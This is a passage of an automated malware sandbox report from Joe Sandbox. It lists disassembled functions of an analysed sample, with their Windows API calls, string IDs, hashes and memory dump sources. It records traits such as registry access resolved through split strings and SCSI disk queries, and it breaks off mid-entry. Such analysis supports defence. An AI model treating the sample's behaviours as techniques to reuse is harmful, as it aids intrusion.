                                                                                                                                                                                                          • Opcode ID: e89d293cc6f43baeae4c7ee4a275d08ccf4f8a59759e68ab998d6fc359240ff2
                                                                                                                                                                                                          • Instruction ID: e38103c641343cb5d3bc4d8a8e41327d8992d39a483517a852c7ba269d488704
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e89d293cc6f43baeae4c7ee4a275d08ccf4f8a59759e68ab998d6fc359240ff2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A441CC70A08609EFDB00DF58D90AB9DBFB4FB58724F10425BE918A7380DBB42A04DB81
                                                                                                                                                                                                          Function 0041BCA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597CEC), ref: 0041BD0E
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0041BD2A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597CEC), ref: 0041BD45
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597CEC), ref: 0041BD9B
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: h|Y$|Y
                                                                                                                                                                                                          • API String ID: 916978925-1160884022
                                                                                                                                                                                                          • Opcode ID: 84fdaac8ad93ef91a329be4d2c44522c410de9c2249f0c112c1177446758e0a2
                                                                                                                                                                                                          • Instruction ID: 2024343d8898a4aa7da2f1cef3246a4f5f20e8986fe773f635a54903359e9df4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84fdaac8ad93ef91a329be4d2c44522c410de9c2249f0c112c1177446758e0a2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3231DF31A586089FDB25DF58DC0679DBBA4FB18B24F10029BE810A73C1DBB51E048BC5
                                                                                                                                                                                                          Function 004824A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,Static,00571978,40000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 004824DD
                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 00482504
                                                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0048251A
                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0048252A
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0048253C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$CallbackCreateDispatchDispatcherEventUserWindow
                                                                                                                                                                                                          • String ID: Static
                                                                                                                                                                                                          • API String ID: 312368105-2272013587
                                                                                                                                                                                                          • Opcode ID: fa1ece8e85bdf012145b54dadb40929e6a1536082b7114be0bf3f0c354d4179e
                                                                                                                                                                                                          • Instruction ID: 979fb23471b1be8e337246d7cc5ea988c0ea6b3f1cb88725fb2cb1a198af4a63
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa1ece8e85bdf012145b54dadb40929e6a1536082b7114be0bf3f0c354d4179e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2721EB30A80319BBEF109F64DC0AF5BBB68FB05714F204626F604B61D0DBB4F9048B98
                                                                                                                                                                                                          Function 00416F20 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 51registrylibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00416F73
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,00000000), ref: 00416F8E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveOpenProc
                                                                                                                                                                                                          • String ID: RegO$W$eyEx$penK
                                                                                                                                                                                                          • API String ID: 3740573167-4071215687
                                                                                                                                                                                                          • Opcode ID: 7865db6372ee84a016aba1b633210a5238004aaec30d83d770ee428be26785f5
                                                                                                                                                                                                          • Instruction ID: 79ad6419baba601a1acab5e772e6df031d7fb47b8aa7ff297b28d04578d5b2d8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7865db6372ee84a016aba1b633210a5238004aaec30d83d770ee428be26785f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4115275A00309EBCB10DF99D885AEFBBF8AF48704F11401DE509E7341DB74AA44DBA4
                                                                                                                                                                                                          Function 00475100 Relevance: 9.1, APIs: 6, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00475132
                                                                                                                                                                                                          • allocator.LIBCONCRTD ref: 0047513F
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0047514A
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 0047516E
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 0047518E
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 004751AE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: construct$Base::Concurrency::details::ContextIdentityQueueWork$allocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1129248848-0
                                                                                                                                                                                                          • Opcode ID: 67aaf804942d44862f1a7b588047046d6beb734b74c1f61d0beb492d2886c769
                                                                                                                                                                                                          • Instruction ID: 28ea19999b259fdf4395a56d3663ef73513a12457648f4b45807214c0ac3fe85
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67aaf804942d44862f1a7b588047046d6beb734b74c1f61d0beb492d2886c769
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 222136B5E001099BCB04DFA5DC52AFFB7B8EB48718F10452EF519B7341D73969008BA5
                                                                                                                                                                                                          Function 0048CE20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145filelibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048CEBF
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,?,EFE0703F,00000000,00000000), ref: 0048CF72
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,EFE0703F,00000000,00000000), ref: 0048CF83
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,?,EFE0703F,00000000,00000000), ref: 0048CFB5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CreateFile$AddressEnterErrorInit_thread_footerInitializeLastLeaveProc
                                                                                                                                                                                                          • String ID: \GlobalMgr.db
                                                                                                                                                                                                          • API String ID: 2937582819-1229192486
                                                                                                                                                                                                          • Opcode ID: 7283598c3a9f5df7ff006fdca25e4c5fdcb2c7374817a5b1d7b12a5f41eb3c27
                                                                                                                                                                                                          • Instruction ID: 905591a37d6a8b43dd220e73fc9161e0434049f184543c8f5e2753b4af7db452
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7283598c3a9f5df7ff006fdca25e4c5fdcb2c7374817a5b1d7b12a5f41eb3c27
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A51A371A00219ABEB20DF64CC81FDDB7B8FB08714F10459AE659A71D1EBB46A84CF64
                                                                                                                                                                                                          Function 0048FA50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048FAE0
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 0048FB7F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048FC35
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F17B
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F18A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::task_continuation_context::task_continuation_context$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                          • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                                                          • API String ID: 2060200711-2176293039
                                                                                                                                                                                                          • Opcode ID: 5b7d8f7ad94e34154c4cbcf00bd48e9a2534786f9e2be30f8342ced1859308db
                                                                                                                                                                                                          • Instruction ID: c157bf79228966d2e194857386f233021b19a9b6f4e0922547532a4889904160
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b7d8f7ad94e34154c4cbcf00bd48e9a2534786f9e2be30f8342ced1859308db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B5196B098021CAAEB30EB14DC89BDDB774AF55704F1044EAAA08B71C2E7745BC8CF59
                                                                                                                                                                                                          Function 00486350 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(005980C8), ref: 004863D2
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004863EE
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00486409
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(005980C8), ref: 0048645C
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: +bH
                                                                                                                                                                                                          • API String ID: 916978925-3835015316
                                                                                                                                                                                                          • Opcode ID: 575ac6e47312d7d60619535353d645e1a5b02cba07ea9d827ff3e3f384706f11
                                                                                                                                                                                                          • Instruction ID: 0cca4ead0e6ea6a440e6237e246306b027ed8b2c37d93d01c6d358624936cf3f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 575ac6e47312d7d60619535353d645e1a5b02cba07ea9d827ff3e3f384706f11
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF31E3B1D04208DFDB00DF58D90A79EBBF0FB16B24F15436AE811A7391EB716A089B95
                                                                                                                                                                                                          Function 004822B0 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationthreadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,00000000,?,?,?,?,?,?,000000FF), ref: 004822FC
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,000000FF), ref: 00482314
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,000000FF), ref: 00482322
                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(00000028), ref: 00482333
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,000000FF), ref: 004823A4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle$CodeCriticalDeleteExitObjectSectionSingleThreadWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738947277-0
                                                                                                                                                                                                          • Opcode ID: 16a27bef36c3ba62ba695cd804531c77dd142ba971d52ad26475b38dbc73e17f
                                                                                                                                                                                                          • Instruction ID: 779a24adda17da7d69651057d122a5d630690dcffa00759ba924d4571b4758df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16a27bef36c3ba62ba695cd804531c77dd142ba971d52ad26475b38dbc73e17f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2231A0705007059FEB20DF64DA587AFBBF8FB05715F104A2DE85297780DBB9AA08CB54
                                                                                                                                                                                                          Function 00490690 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059699C), ref: 004906F6
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059699C), ref: 0049072F
                                                                                                                                                                                                          • 74A5E3D0.COMCTL32(0041B390,00000000,?,?,?,?,?,00000000,00543F35,000000FF,?,0041AE4C), ref: 00490737
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059699C), ref: 004907AA
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004907BF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1517317770-0
                                                                                                                                                                                                          • Opcode ID: 241b30e65a021626b0382ea85a6c70b8a47595e29c6c836debbe46eb745d4db7
                                                                                                                                                                                                          • Instruction ID: 90fa9c0c4f31fb1ff98b4c1f4cab6027ce4007c811b0ac067db5f816bbeff7b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 241b30e65a021626b0382ea85a6c70b8a47595e29c6c836debbe46eb745d4db7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93313970A403109FDF206F749C16B6A3E94BB54F50F05043BE80597391EBB97D489BDA
                                                                                                                                                                                                          Function 00473C80 Relevance: 7.6, APIs: 5, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473CB2
                                                                                                                                                                                                          • allocator.LIBCONCRTD ref: 00473CBF
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 00473CE3
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 00473D03
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 00473D23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: construct$Base::Concurrency::details::ContextIdentityQueueWorkallocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 516655193-0
                                                                                                                                                                                                          • Opcode ID: f71da5210e215d4c4b9da9c98a74acfd21a708a65f638d528a6cf97167982fa8
                                                                                                                                                                                                          • Instruction ID: 939b9391356c5d5b4b57b71079dadd5257edf8891a5786d6e093f8026eca27aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f71da5210e215d4c4b9da9c98a74acfd21a708a65f638d528a6cf97167982fa8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B2174B5D001099BC704DF95E941BFFB7B8EB44318F14852EE919B7381D739AA058BA2
                                                                                                                                                                                                          Function 004823E0 Relevance: 7.6, APIs: 5, Instructions: 67synchronizationthreadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,00000000,?,00800BF0), ref: 004823F6
                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,?), ref: 0048240F
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00482427
                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00800BF0), ref: 00482455
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,?,?,?,00800BF0), ref: 00482479
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ObjectSingleThreadWait$CodeEventExitResetResume
                                                                                                                                                                                                          • String ID:
